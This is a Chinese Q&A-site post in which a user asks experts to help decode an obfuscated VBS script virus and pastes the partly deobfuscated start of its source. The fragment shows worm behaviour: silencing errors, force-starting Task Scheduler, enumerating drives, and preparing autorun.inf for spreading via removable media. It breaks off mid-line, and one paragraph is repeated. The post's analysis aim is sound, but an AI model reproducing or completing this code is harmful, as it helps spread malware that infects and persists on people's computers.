UC知道与牛人共同解密这个VBS脚本病毒!
来源:百度知道 编辑:UC知道 时间:2024/06/20 21:45:08
由于比较大。所以不能贴出来。 http://hi.baidu.com/zz396988160/blog/item/e5d43e108a9f47fac3ce7997.html
本来想对vbs脚本病毒做个介绍。但想想对牛人没必要。也可以使不懂的人离开。
我自己用创建过程再替换execute方法试过。可遇到了一些问题。具体我在上面的链接里会写出来。
并不希望一时半会解决。只希望能有进展,哪怕是一点点。
本来想对vbs脚本病毒做个介绍。但想想对牛人没必要。也可以使不懂的人离开。
我自己用创建过程再替换execute方法试过。可遇到了一些问题。具体我在上面的链接里会写出来。
并不希望一时半会解决。只希望能有进展,哪怕是一点点。
我最后得到了以下代码:
on error resume next
j="\":til="SY":btj=900:vs=".vbs":ve=".vbe":cm="%comspec% /c ":dfo="/u#t/":inf="\autorun.inf"
set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")
set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * from win32_operatingsystem")
set dc=fso.drives:set ats=wmi.execquery("select * from win32_service where name='Schedule'")
for each atc in ats:cat=atc.state:next:if cat="Stopped" then ws.run "net start ""task scheduler""",0,false
ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))
cnr="\computername":cnp="HK